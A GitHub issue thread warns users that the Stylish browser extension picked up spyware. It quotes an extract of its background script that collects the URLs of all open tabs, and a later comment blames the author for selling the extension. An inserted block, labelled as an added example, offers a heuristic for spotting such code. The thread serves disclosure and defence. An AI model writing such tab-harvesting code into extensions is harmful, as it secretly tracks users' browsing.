[WARNING] Stylish 3.1.1 in AMO contains spyware #335

Open
Lekensteyn opened this issue Jul 4, 2018 · 5 comments

Lekensteyn commented Jul 4, 2018

Hi users of Stylish,

It appears that the Stylish extension (based on the code in this repo) has gained tracking code. Using Rob's excellent CRX Viewer I noticed some fishy code in src/background.js that was loaded on startup and code that was injected in every Google search page. Effects:

  1. The full URL of all open tabs and all pages you visit.
  2. The titles and URLs of every Google search result

Recommended steps:

  1. Remove the Stylish extension (Firefox should already have disabled the extension)
  2. (Optional:) install https://github.com/openstyles/stylus as replacement

Proof: https://twitter.com/Lekensteyn/status/1014307299475763201
More details:
https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/
https://bugzilla.mozilla.org/show_bug.cgi?id=1472948

Relevant extract for the first issue (src/background.js):

```js
chrome.windows.getAll({
    populate: true
}, function(windows) {
    for (var w = 0; w < windows.length; w++) {
        for (var i = 0; i < windows[w].tabs.length; i++) {
            if (!isRealUrlAddress(windows[w].tabs[i].url)) {
                continue;
            }
            stylesUpdater.updateQueryParams(windows[w].tabs[i].id, {
                reset: true,
                gp: windows[w].tabs[i].url // <-- WTF
            });
            if (windows[w].focused && windows[w].tabs[i].active) {
                stylesUpdater.gpStyleUpdate(windows[w].tabs[i]);
            }
        }
    }
});
```
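
Added example, not part of the original issue or of the Stylish code: one way to triage an unpacked extension for the pattern in the extract above, a line-based heuristic that lists object-literal properties passing a `.url` value into a function call. The function name `findUrlArguments`, the matching rules and the sample input are assumptions made for illustration.

```javascript
// Added example (not from the extension or the issue): a line-based heuristic
// that lists object-literal properties passing a ".url" value into a call.
const KEYWORDS = new Set(["if", "for", "while", "switch", "catch", "function"]);

function findUrlArguments(source) {
  const findings = [];
  const braces = []; // per open "{": name of the call it is an argument of, or null
  source.split("\n").forEach((raw, idx) => {
    const line = raw.replace(/\/\/.*$/, ""); // drop trailing line comments
    const prop = line.match(/^\s*([A-Za-z_$][\w$]*)\s*:\s*([\w$.\[\]]+\.url)\b/);
    const callee = braces[braces.length - 1];
    if (prop && callee) {
      findings.push({ line: idx + 1, callee, key: prop[1], value: prop[2] });
    }
    const parens = []; // names of calls whose "(" is still open on this line
    for (let i = 0; i < line.length; i++) {
      const ch = line[i];
      if (ch === "(") {
        const name = (line.slice(0, i).match(/([A-Za-z_$][\w$.]*)\s*$/) || [])[1];
        parens.push(name && !KEYWORDS.has(name) ? name : null);
      } else if (ch === ")") {
        parens.pop();
      } else if (ch === "{") {
        braces.push(parens.length ? parens[parens.length - 1] : null);
      } else if (ch === "}") {
        braces.pop();
      }
    }
  });
  return findings;
}

// Constructed sample, modelled on the extract quoted in the issue.
const SAMPLE = [
  "chrome.windows.getAll({",
  "    populate: true",
  "}, function(windows) {",
  "    for (var i = 0; i < windows[0].tabs.length; i++) {",
  "        if (!isRealUrlAddress(windows[0].tabs[i].url)) { continue; }",
  "        stylesUpdater.updateQueryParams(windows[0].tabs[i].id, {",
  "            reset: true,",
  "            gp: windows[0].tabs[i].url // constructed comment",
  "        });",
  "    }",
  "});",
].join("\n");

console.log(findUrlArguments(SAMPLE));
```

Each finding is a candidate for manual review: the heuristic does not follow the value to a network request, and it misses calls that pass the whole tab object.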

333van commented Jul 4, 2018

The news was available in 2017. You can opt-out but I am leaving Stylish and going for Stylus.

@Lekensteyn
Author

@IAMEVANHE AFAIK that was limited to the Chrome extension, I don't know when the Firefox extension started getting such malicious behavior.

@sparskakyl

Well, you can modify/remove fishy code to make it not spyware.

@Lekensteyn
Author

@sparskakyl You are missing the point.

"Vertrouwen komt te voet en vertrekt te paard." [nl]
"Once bitten, twice shy"

There is no way I am ever going to use this extension again. Perhaps Stylus, but for now I have replaced the styles that I still use by some Greasemonkey scripts. For example:

```js
// ==UserScript==
// @name      Style: Show Bugzilla attachment ID
// @namespace https://lekensteyn.nl/
// @match     https://bugs.wireshark.org/*
// @version   1
// @grant     none
// ==/UserScript==

((css) => {
  let style = document.createElement("style");
  style.textContent = css;
  document.body.appendChild(style);
})(`
a[href^="#attach_"]:before {
  font-size: medium;
  content: attr(href) ": ";
}
`);
```

@dragetd

dragetd commented Jul 7, 2018

The original author sold the name and Mozilla addon repo access to a data mining company. He was fully aware where this was going and left the users in the dark who did not actively search for this information.

I blame @JasonBarnabe just as much as this company for this move!
